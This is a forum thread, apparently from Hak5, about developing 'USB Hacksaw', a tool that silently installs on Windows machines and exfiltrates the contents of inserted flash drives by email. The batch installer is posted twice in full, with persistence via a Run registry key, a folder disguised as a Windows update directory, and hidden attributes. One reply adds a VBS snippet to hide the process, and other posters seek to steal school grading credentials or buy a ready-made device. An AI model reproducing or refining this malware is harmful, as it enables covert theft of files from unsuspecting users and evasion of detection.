Jump to content

USB Hacksaw Development


Darren Kitchen

Recommended Posts

  • Replies 148
  • Created
  • Last Reply

Top Posters In This Topic

  • 1 month later...
  • 1 month later...

Hello, pretty much all the links no longer exists & it is hard to find the exact topic I want.

I have a U3 Sandisk Cruiser & I want to have my U3 auto run my own most used programs, rather than hack my own PCs/Laptops to death.

I know I saw a topic on how to replace the U3 virtual CD a long time ago, but I cant find it anymore.

Does anyone know the link to a page on this? [or website?]

EDIT:

I just read on the Sandisk site that my USB device [Titanium Plus] is not compatible with the LP Installer

Thanks

Link to comment
Share on other sites

  • 4 weeks later...

I was wondering, at my school they use the program Gradewise, will the hacksaw get me that progam and my teachers usernames and passwords? Im looking for that A- (not plus it'll be too suspicious :)) If so can you guys send me an Message to help me out?

Link to comment
Share on other sites

  • 2 weeks later...
  • 1 month later...
  • 2 months later...
Isn't this like...illegal? (Correct me if I'm wrong though...I thought this place was about the good side of the whole hacking scene.)

The illegalitty is not what you have, but what you do with it... If you do illegalitties, then it's illegal<_<

Link to comment
Share on other sites

  • 4 weeks later...
  • 5 weeks later...

I have made this to auto run on non u3 drives silently and have done some other tweaks to make this more efficient but I cannot for the life of me get cmd to exit automatically!

The window never shows you don't see a thing but how do i get it to exit? If you open task manager under processes you will see cmd.exe can i make this kill itself or exit?

if exist C:Void.txt GOTO end
::Use /\/\ to keep from infecting yourself
:: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc
:: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss
:: 
:: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently 
:: install on windows 2000, XP, or 2003 machines with either administrator or guest access. 
:: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or
:: startup folder depening on user rights, and start the program.
:: 
:: This hack is based on a modified version of USBDumper. Once installed on a targert machine it will 
:: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the 
:: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper,
:: then silently run the send.bat file located in the same directory, which will then archive the contents 
:: using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the 
:: downloaded data to an email address, and remove the documents and archives.
:: 
:: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method
:: for determining user rights and thus installing accordingly was planned, however problems with the 
:: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more
:: elegent method of determining user privledges. (Thinking outloud: try creating a file where guests
:: shouldnt be able to and check errorlevel).
:: 
:: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org
:: Programs used:
:: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml
:: Stunnel -- http://www.stunnel.org/
:: Blat -- http://www.blat.net/
:: Shortcut --  http://www.optimumx.com/download/#Shortcut
:: Rar -- http://www.rarlabs.com/
:: 
:: More information and future developments of this hack can be found at:
:: http://www.hak5.org/wiki/USB_Hacksaw




:: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs
mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs"

:: go to payload directory
cd \WIP\SBS

:: remove hidden and system attributes (makes next copy command happy, probably better way to do this)
attrib *.* -s -h

:: copy payload to target
copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs"

:: reapply hidden and system attributes
attrib *.* +s +h

:: If admin register USB Hacksaw as startup program in registry, else do it the yucky way
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico"

:: Hide USB Hacksaw
attrib %systemroot%\$NtUninstallKB931337$ +s +h &amp; attrib "%appdata%\sbs" +s +h

:: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below)
:: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe"
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB931337$
sbs.exe

:end

I have tried:

exit

@exit

taskkill /f /cmd.exe

exit /b 1

close

How can I make it end itself? Make it not seen in Task Manager

Link to comment
Share on other sites

  • 1 month later...

I'm new to the forums, and this is my first post.

the USB U3 HackSaw is awesome, but just a couple questions :unsure:

Where do I define the SMTP server? the port to use for SMTP?

and in send.bat theres the line

-server 127.0.0.1:1099

i know the 127 etc is localhost, but is THAT where i should define email server, or leave the localhost and port 1099 as is.

Thank you in advance everyone. :lol:

Link to comment
Share on other sites

  • 2 months later...
I have made this to auto run on non u3 drives silently and have done some other tweaks to make this more efficient but I cannot for the life of me get cmd to exit automatically!

The window never shows you don't see a thing but how do i get it to exit? If you open task manager under processes you will see cmd.exe can i make this kill itself or exit?

if exist C:Void.txt GOTO end
::Use /\/\ to keep from infecting yourself
:: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc
:: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss
:: 
:: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently 
:: install on windows 2000, XP, or 2003 machines with either administrator or guest access. 
:: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or
:: startup folder depening on user rights, and start the program.
:: 
:: This hack is based on a modified version of USBDumper. Once installed on a targert machine it will 
:: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the 
:: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper,
:: then silently run the send.bat file located in the same directory, which will then archive the contents 
:: using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the 
:: downloaded data to an email address, and remove the documents and archives.
:: 
:: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method
:: for determining user rights and thus installing accordingly was planned, however problems with the 
:: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more
:: elegent method of determining user privledges. (Thinking outloud: try creating a file where guests
:: shouldnt be able to and check errorlevel).
:: 
:: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org
:: Programs used:
:: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml
:: Stunnel -- http://www.stunnel.org/
:: Blat -- http://www.blat.net/
:: Shortcut --  http://www.optimumx.com/download/#Shortcut
:: Rar -- http://www.rarlabs.com/
:: 
:: More information and future developments of this hack can be found at:
:: http://www.hak5.org/wiki/USB_Hacksaw




:: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs
mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs"

:: go to payload directory
cd \WIP\SBS

:: remove hidden and system attributes (makes next copy command happy, probably better way to do this)
attrib *.* -s -h

:: copy payload to target
copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs"

:: reapply hidden and system attributes
attrib *.* +s +h

:: If admin register USB Hacksaw as startup program in registry, else do it the yucky way
reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico"

:: Hide USB Hacksaw
attrib %systemroot%\$NtUninstallKB931337$ +s +h &amp; attrib "%appdata%\sbs" +s +h

:: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below)
:: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe"
%systemdrive%
cd \
cd %systemroot%
cd $NtUninstallKB931337$
sbs.exe

:end

I have tried:

exit

@exit

taskkill /f /cmd.exe

exit /b 1

close

How can I make it end itself? Make it not seen in Task Manager

Are you using a vbs file to execute cmd.exe?

If so use make a vbs file with this code.

'=====================================...
Set WshShell = WScript.CreateObject("WScript.Shell")
obj = WshShell.Run("\WIP\CMD\go.cmd", 0)
set WshShell = Nothing
'=====================================...

If you do not know how to make a vbs file I have attached mine in a rar file since you can't upload vbs files. :)

go.rar

Link to comment
Share on other sites

  • 1 year later...

Hey all..

Saw the hacksaw video on the internet few days ago seems very nice!! Since I'm not that good with computers, can some one send me a file with everything already on it so i dont need to change anything, or an already working device. I'll pay him generously:)

Thanks!!

you can write me an email: meroz.oren@gmail.com

Link to comment
Share on other sites

  • 2 years later...
  • 2 weeks later...
  • 8 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...